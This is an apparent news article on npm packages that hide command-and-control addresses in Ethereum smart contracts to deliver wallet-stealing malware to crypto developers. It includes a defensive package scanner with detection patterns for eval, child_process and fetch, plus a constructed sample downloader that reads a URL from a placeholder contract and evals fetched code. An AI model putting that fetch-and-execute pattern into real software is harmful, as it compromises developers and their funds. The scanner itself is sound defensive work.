Malicious npm Packages Attack Ethereum Smart Contracts, Endangering Crypto Developers

The software supply chain is under attack, and the latest threat involves malicious npm packages targeting Ethereum smart contracts. Cybersecurity researchers have uncovered a sophisticated campaign where these packages exploit smart contracts to conceal command-and-control (C2) infrastructure and deliver malware, endangering cryptocurrency developers and users. This novel tactic represents an evolving threat, according to firms like ReversingLabs, Checkmarx, and Socket, who have been at the forefront of discovering and analyzing these attacks.

Malicious NPM packages target crypto developers

The Players Involved

The perpetrators are sophisticated threat actors employing advanced social engineering and deception techniques. These actors are adept at creating seemingly legitimate packages and repositories to lure unsuspecting developers. Cybersecurity firms, including ReversingLabs, Checkmarx, and Socket, have been instrumental in uncovering and analyzing these attacks. Researchers such as Lucija Valentić and Karlo Zanki from ReversingLabs have specifically highlighted the unique methods employed by these threat actors.

The primary targets are crypto developers. Attackers often lure them through fake GitHub repositories designed to appear as legitimate cryptocurrency trading tools. These repositories are meticulously crafted to mimic genuine projects, making it difficult for developers to distinguish between safe and malicious code.

Attack Timeline and Tactics

The malicious campaign has been ongoing for nearly a year, with new packages appearing regularly. Researchers identified two new malicious npm packages, “colortoolsv2” and “mimelib2,” uploaded to the npm registry in July 2025. These packages, along with others like “jest-fet-mock” (discovered in November 2024) and “nodejs-smtp” (uploaded in April 2025), function as downloaders. Instead of embedding malicious URLs directly, they leverage Ethereum smart contracts to store and retrieve the addresses of C2 servers, which then deliver second-stage malware payloads to compromised systems.

This innovative use of blockchain technology makes detection significantly harder. The malicious infrastructure is hidden within seemingly legitimate blockchain code, allowing traffic to appear normal. This evasion technique represents a significant evolution in software supply chain attacks.

Ethereum Smart Contract Abuse

A key element of this attack is the abuse of Ethereum smart contracts. The attackers store the addresses of their command-and-control (C2) servers within these contracts. This approach provides several advantages for the attackers:

  • Decentralization: The C2 infrastructure is distributed across the blockchain, making it difficult to shut down.
  • Immutability: Once the addresses are stored in the smart contract, they cannot be easily altered or removed.
  • Obfuscation: The malicious URLs are hidden within the blockchain code, making them harder to detect using traditional security measures.

Scope and Impact

The attacks span the npm registry, where the malicious packages are hosted, and GitHub, which is used to promote these packages through deceptive means. The Ethereum blockchain serves as the clandestine host for the C2 infrastructure, storing the URLs for the malware payloads. The malware ultimately targets developers’ systems, with some variants affecting Windows, Linux, and macOS environments. Specifically, some variants target desktop cryptocurrency wallets like Atomic and Exodus on Windows, according to security reports.

ReversingLabs’ 2025 Software Supply Chain Security report documented 23 crypto-related malicious campaigns in 2024 alone, indicating a persistent and evolving threat landscape. This data underscores the severity and increasing frequency of these types of attacks.

Motivation and Deception

The primary motivation behind these attacks is to compromise developer systems, install downloader malware, and ultimately steal cryptocurrencies and sensitive data. Threat actors are constantly innovating their distribution and evasion strategies, and the use of Ethereum smart contracts offers a resilient, decentralized, and immutable C2 infrastructure that is difficult to shut down or detect using traditional security measures.

Attackers exploit the trust associated with open-source repositories and the desire of developers for convenient tools, particularly in the lucrative cryptocurrency space. They create fake GitHub repositories, often masquerading as popular cryptocurrency trading bots (e.g., “solana-trading-bot-v2”, “ethereum-mev-bot-v2”), complete with fabricated commits, multiple fake maintainer accounts, and polished documentation to appear credible.

The Evolving Threat Landscape

The use of malicious npm packages represents a significant evolution in supply chain attack strategies. Developers are being tricked into downloading and integrating these packages into their projects through sophisticated social engineering tactics. Once incorporated, the malicious code executes, fetching and installing second-stage malware. For instance, “nodejs-smtp” can unpack legitimate wallet applications, inject malicious code to redirect cryptocurrency transactions, and repackage them. This process allows attackers to intercept and divert funds from unsuspecting users.

This new attack vector makes traditional detection and mitigation approaches less effective and poses a severe risk to software supply chains, developer machines, and potentially even CI/CD systems. Cybersecurity experts emphasize the critical need for developers to thoroughly vet every library they consider implementing, looking beyond superficial metrics like stars or downloads. According to The Hacker News, a more rigorous approach to dependency management is essential to mitigate these risks.
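As an added example (not code from the article or from the researchers it cites), here is a heuristic check a defender could run over an unpacked npm package before installing it. It flags the combination the article describes, a contract read through an Ethereum library plus dynamic execution or a remote download, and notes whether a lifecycle script would run that code at install time. The indicator patterns and both sample packages are constructed for illustration and contain no real addresses or URLs.

```javascript
// Heuristic scanner for the "smart-contract downloader" pattern in an npm package.
// Indicator regexes below are constructed, not a vendor signature set.
const INDICATORS = {
  lifecycleScript: /"(pre|post)install"\s*:/,            // runs at install time
  ethereumRead: /\b(ethers|web3)\b|eth_call|JsonRpcProvider/, // reads a contract
  dynamicExec: /\beval\s*\(|new Function\s*\(|child_process|\bexecSync\b/,
  remoteFetch: /\b(https?\.get|fetch|axios)\s*\(/,       // pulls a second stage
};

// files: map of relative path -> file contents for the unpacked package.
function scanPackage(files) {
  const hits = new Set();
  for (const [name, text] of Object.entries(files)) {
    const checks = name === "package.json"
      ? ["lifecycleScript"]
      : ["ethereumRead", "dynamicExec", "remoteFetch"];
    for (const key of checks) if (INDICATORS[key].test(text)) hits.add(key);
  }
  // A chain read alone is normal for a crypto tool; the signal is a chain read
  // that feeds execution or a download, especially from a lifecycle hook.
  const suspicious = hits.has("ethereumRead") &&
    (hits.has("dynamicExec") || hits.has("remoteFetch"));
  return { hits: [...hits].sort(), suspicious, installTime: hits.has("lifecycleScript") };
}

// Constructed sample resembling the downloader pattern (placeholder address/URL).
const SAMPLE_SUSPICIOUS = {
  "package.json": '{"name":"color-utils-example","scripts":{"postinstall":"node index.js"}}',
  "index.js": [
    'const { ethers } = require("ethers");',
    'const provider = new ethers.JsonRpcProvider("https://rpc.example.invalid");',
    'const abi = ["function getUrl() view returns (string)"];',
    'const c = new ethers.Contract("0x0000000000000000000000000000000000000000", abi, provider);',
    'c.getUrl().then(u => fetch(u).then(r => r.text()).then(code => eval(code)));',
  ].join("\n"),
};

// Constructed benign package with no chain access and no lifecycle hook.
const SAMPLE_BENIGN = {
  "package.json": '{"name":"color-utils-example","main":"index.js"}',
  "index.js": 'module.exports = { hex: (r, g, b) => "#" + [r, g, b].map(v => v.toString(16).padStart(2, "0")).join("") };',
};

console.log(scanPackage(SAMPLE_SUSPICIOUS)); // suspicious: true, installTime: true
console.log(scanPackage(SAMPLE_BENIGN));     // suspicious: false
```

Running `npm install --ignore-scripts` while vetting a package keeps any lifecycle hook from executing before the scan has been done.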

Conclusion

The threat of malicious npm packages exploiting Ethereum smart contracts is a serious and evolving concern for cryptocurrency developers. By using sophisticated social engineering tactics and innovative methods to conceal their command-and-control infrastructure, attackers are able to compromise developer systems and steal valuable cryptocurrencies. As highlighted by ReversingLabs and other cybersecurity firms, vigilance, thorough vetting of dependencies, and a proactive approach to security are essential to protect against these increasingly sophisticated attacks.
